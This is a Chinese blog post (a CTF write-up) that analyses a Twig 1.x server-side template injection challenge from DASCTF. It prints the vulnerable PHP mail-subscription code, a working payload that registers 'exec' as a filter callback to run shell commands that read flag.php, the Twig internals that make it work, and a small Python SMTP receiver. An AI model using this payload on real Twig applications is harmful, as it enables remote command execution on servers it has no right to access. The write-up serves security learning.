搭建一个ctf_由一道CTF赛题分析Twig SSTI利用方式

最新推荐文章于 2023-06-04 13:06:11 发布
最新推荐文章于 2023-06-04 13:06:11 发布
阅读量623 收藏 2
点赞数
文章标签: 搭建一个ctf

前言

在上周末刚刚结束的安恒6月赛DASCTF中,有一道web题涉及 Twig 模板注入,而两个月前的 volgactf 也涉及了同样的内容,但所使用的版本不同。本文通过CTF题的解法来分析 Twig 模板注入的利用方式

Subscribe@DASCTF

这是一道白盒代码审计题,给出的源码如下(作者注:本题目是基于Twig 1.x版本)

phprequire_once "mail/smtp.class.php";require_once "mail/smtp.send.php";require_once "libs/common.func.php";include 'vendor/twig/twig/lib/Twig/Autoloader.php';function mailCheck($s) {    if (preg_match('/\\\|\/|\~|&|\^|\`|\*|\?/i',$s))    {        alertMes('damn hacker!', './index.php');        return false;    }    if (!preg_match('/libs|smtp|curl|dev|index\.php|ftp|backdoor|sh/i', $s) )    {        if (  preg_match_all('/@/', $s) === 1 )        {            $arr = explode('@',$s);            $domain = end($arr);            if (!preg_match('/[^a-z0-9._-]/i', $domain))            {                return true;            }        }    }    return false;}function alertMes($mes, $url){    echo "            alert('{$mes}');            location.href='{$url}';    ";    die;}$smtpEmailTo = $_POST['toemail'];if (!mailCheck($smtpEmailTo)){    alertMes("hacker", "/index.php"); //die;}//为了减少邮件服务器压力,任何fuzz都请带上$_POST['test'] 请充分测试后再订阅并发邮件,如果检测到某个用户频繁无脑发邮件会被封禁。if (isset($_POST['test'])){    user_are_fuzzing_and_smtp_server_wont_send_email();    die;}//do not trickTwig_Autoloader::register();$loader = new Twig_Loader_String()$twig = new Twig_Environment($loader);$yourName = pos(explode( '@', $smtpEmailTo));$content = @$twig->render($yourName);$mailcontent = "

Hello "

.$content."
Welcome to DASCTF June, Have FUN!";$smtp = new Smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);$smtp->debug = false;$state = $smtp->sendmail($smtpEmailTo, $smtpusermail, $mailtitle, $mailContent, $mailtype);/* flag is in flag.php */

首先我们分析本题目代码逻辑,由用户传入一个Email地址,服务器端从用户输入的Email地址中提取用户名传入Twig模板,渲染一封包含用户名的邮件发送至该Email地址。

利用点在提取用户名并渲染的逻辑中,我们可以看到 $yourname 是提取 $smtpEmailTo 中 @前面的值,既用户名,然后在 $content = @$twig->render($yourName); 中将用户名直接传入Twig 模板渲染执行。由于 $yourName 是由用户输入,完全可控。

然后我们看 mailCheck 函数中的过滤规则,两个if判断逻辑过滤了几种特殊符号和关键字,并没有过滤花括号{}和一些其他关键类名,所以我们可以构造形如 {{7*7}}@yourmail.com 的Email地址传入进行SSTI。

payload分析

本题所用payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("a=cat;b=flag.php;$a $b")}}@yourmail.com
_self

_self在Twig框架中是一个特殊全局变量,会返回当前 \Twig\Template 实例,可以继续调用实例中的方法,相关代码位src/Node/Expression/NameExpression.php 

class NameExpression extends AbstractExpression{    protected $specialVars = [        '_self' => '$this',        '_context' => '$context',        '_charset' => '$this->env->getCharset()',    ];        …………省略其他代码……………

注意因为本题目中使用Twig 1.x版本,所以此方法有效,在后续的2.x 和 3.x 版本中,这一变量只能返回当前实例名字符串

class NameExpression extends AbstractExpression{    private $specialVars = [        '_self' => '$this->getTemplateName()',        '_context' => '$context',        '_charset' => '$this->env->getCharset()',    ];        …………省略其他代码……………

官方文档https://twig.symfony.com/doc/1.x/deprecated.html#globals

registerUndefinedFilterCallback 和 getFilter

这两个函数都位于 src/Environment.php

public function getFilter($name){    if (!$this->extensionInitialized) {        $this->initExtensions();    }    if (isset($this->filters[$name])) {        return $this->filters[$name];    }    foreach ($this->filters as $pattern => $filter) {        $pattern = str_replace('\\*', '(.*?)', preg_quote($pattern, '#'), $count);        if ($count) {            if (preg_match('#^'.$pattern.'$#', $name, $matches)) {                array_shift($matches);                $filter->setArguments($matches);                return $filter;            }        }    }    foreach ($this->filterCallbacks as $callback) {        if (false !== $filter = \call_user_func($callback, $name)) {            return $filter;        }    }    return false;}public function registerUndefinedFilterCallback($callable){    $this->filterCallbacks[] = $callable;}

registerUndefinedFilterCallback("exec")exec 传入到全局数组 filterCallbacks[] 中,getFilter("a=cat;b=flag.php;$a $b")"a=cat;b=flag.php;$a $b" 传入 $name  

call_user_func

最终的命令执行点在foreach中的 call_user_func

09cd15ce869e32bf450d267c91de2815.png

$callback 为数组中的值,此处为 exec ,所以此处 call_user_func 执行的是

call_user_func("exec", "a=cat;b=flag.php;$a $b")

达到了最终执行命令的目的

还要个邮件服务器

对于本CTF题,我们还需要通过该地址接收邮件才能看到回显的flag,而一般的邮件服务提供商基本不允许用户名中存在特殊符号,所以我们在vps上用python临时搭建一个邮件服务器,并将域名MX记录解析到vps上。这是一个python邮件服务器的简易脚本

from __future__ import print_functionfrom datetime import datetimeimport asyncorefrom smtpd import SMTPServerclass EmlServer(SMTPServer):    no = 0    def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,rcpt_options=None):        filename = '%s-%d.eml' % (datetime.now().strftime('%Y%m%d%H%M%S'),                self.no)        f = open(filename, 'wb')        print(data)        f.write(data)        f.close        print('%s saved.' % filename)        self.no += 1def run():    foo = EmlServer(('0.0.0.0', 25), None)    try:        asyncore.loop()    except KeyboardInterrupt:        passif __name__ == '__main__':    run()

结语

本题是基于Twig 1.x开发,payload中所使用的_self变量在之后的版本已经弃用。在之后的文章我们将分享Twig 2.x & 3.x SSTI利用方式。

求👍求转求点在看

长按图片关注公众号

e82fb2d502882ac36838d69a058e4bf5.png

weixin_39620273
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XCTF-攻防世界CTF平台-Web类——15、easytornado(SSTI服务器模板注入、Tornado 框架render渲染函数、MD5加密)
Onlyone_1314的博客
12-11 2762
目录标题找到注入点查看tornado的官方文档得到cookie_secret的值计算md5值得到flag 打开题目地址: 题目描述使用了Tornado 框架,Tornado是Python的一种 Web 服务器软件框架。 有三个文件,分别查看: 提示flag所在的文件/fllllllllllllag,url中GET方式提交了2个参数:filename=/flag.txt&filehash=6d9ebcb83324409e048e0d8086173713 提示使用了render函数,由于rend
BUUCTF easy_tornado render模板注入
hhh
10-09 1004
模板注入详解请看这里:https://www.cnblogs.com/cimuhuashuimu/p/11544455.html 题目一开始给了三个文件的链接,分别查看: flag.txt里告诉我们文件在/fllllllllllllag里,welcome.txt我们给我们一个关键词render,经过搜索之后知道有render函数的模板注入;最重要的是hint.tx...
uctf信息安全_UCTF2016 twi Writeup
weixin_39613561的博客
12-21 448
前言该题目分类为REVERSE。最终目标是提交一个flag。从题目来看,本题目应该是UCTF 2016中的题目,可能是由于笔者的搜索能力还有待提高,没有能够找到相关的Writeup。所以,本次只能自己摸着石头过河了。解题准备验证下载正确性基础信息分析文件类型识别可以看到,文件是Atmel AVR 8-bit 的ELF文件。查看是否有隐藏信息从binwalk的结果来看,应该没有什么隐藏的数据。字符串...
SSTI注入————php的SSTI
wwwwyyyrre的博客
06-04 991
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti这里不细致介绍模板之类的内容 提供关于ssti注入的题 在题中理解 涉及的内容较多 这里提供一个大佬讲解的ssti的详细内容。
Twig模板为例浅学一手SSTI
蚁景网安学院
12-17 1243
什么是SSTISSTI:开局一张图,姿势全靠ySSTI,即服务器端模板注入(Server-Side Template Injection)常见的注入有:SQL 注入,XSS 注入,XPAT...
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py web_chinaz 10 web_chinaz 为应用...
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
适合小白学的基础知识—SSTI漏洞学习
Innocence_0的博客
02-12 630
适合小白学的基础知识—SSTI漏洞学习
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5394
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
如何巧用vps解题?
蚁景网安学院
02-23 1248
点击蓝字关注我们前言对于Web方向的选手来说,拥有一台vps可以快速解决一些RCE问题,本篇文章所演示的是2015年HITCON的一道web题,虽然时隔有些久,但是这题所利用的trick以...
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1621
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
SSTI相关总结 (smarty/twig)
桃雾雨Rain的博客
01-30 898
SSTI在用户可控的地方可能发生。 一、PHP smarty注入 smarty是php的一个模板引擎。更明确的来说,它可以帮助开发者更好的分离程序逻辑和页面显示。这里略过一些罗嗦的smarty的介绍。 *payload (1) 获取smarty版本号: {$smarty.version} (2) 执行php代码 {php}echo `id`;{/php} //注意这个在3.x版本的时候就已经废弃了 (3) getshell {Smarty_Internal_Write_File::writ
CTF之web安全
weixin_45722313的博客
04-02 9793
web安全 CSRF 简介 CSRF,全名 Cross Site Request Forgery,跨站请求伪造。很容易将它与 XSS 混淆,对于 CSRF,其两个关键点是跨站点的请求与请求的伪造,由于目标站无 token 或 referer 防御,导致用户的敏感操作的每一个参数都可以被攻击者获知,攻击者即可以伪造一个完全一样的请求以用户的身份达到恶意目的。 CSRF 类型 按请求类型,可分为 GE...
关于Twig
aetlypdlg_ys的博客
05-06 147
简单介绍下Twig sstiSSTI,即服务器端模板注入(Server-Side Template Injection)常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入的成因是从用户获得一个输入后,经过后端脚本语言进行数据库查询,这时我们就可以构造输入语句来进行拼接,从而实现我们想要的sql语句。
CTF攻防世界web题解题思路XFF-REFERER
m0_63687631的博客
12-25 3068
1.打开网页 2.然抓个包改变下ip 3.用X-Forwarded-For改变ip,如图: 4.因为要重复使用所以要用repeater,然后发送 5. 然后是这样,点击render 6.最后输入referer 7.点render,可得到flag 知识点: 1.ip地址可以用,X-Forwarded-For改 2.referer是就是来源网站。 ...
ctf之WEB练习二
渗透测试研究中心
12-15 8778
题目名称:从0到1CTFer成长之路-Web文件上传题目wirteup:启动题目场景,获得题目靶场,访问网站,发现是一个文件上传漏洞,并且源代码也显示出来。http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/ 源代码大概如下分析:<?phpheader("Content-Type:text/html; charset=utf-8")...
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了提供一个安全的环境,让参赛选手能够在其中进行攻击和防御的实战训练。 在ctf_awd_platform中,参赛选手将分为多个小队,每个小队都需要同时进行攻击和防御。比赛的过程中,参赛选手需要使用各种技术和工具,对其他小队的系统进行攻击,尝试获取对方的旗帜。同时,参赛选手也需要保护自己的系统,防止其他小队进行攻击并窃取自己的旗帜。 ctf_awd_platform提供了一个仿真的网络环境,模拟了现实世界中的网络系统。参赛选手可以在这个环境中进行攻防实战,通过解决各种网络安全问题来提升自己的技能。 ctf_awd_platform不仅能够帮助参赛选手提升网络攻防技术,还能够提高其团队合作能力和解决问题的能力。在比赛中,参赛选手需要与队友紧密配合,共同制定攻击和防御策略,以获取最佳的比赛成绩。 总体而言,ctf_awd_platform是一个能够帮助参赛选手提升网络安全技术和团队合作能力的AWD平台,通过实战演练来提高参赛选手的技能水平,并为他们在网络安全领域的职业发展打下坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值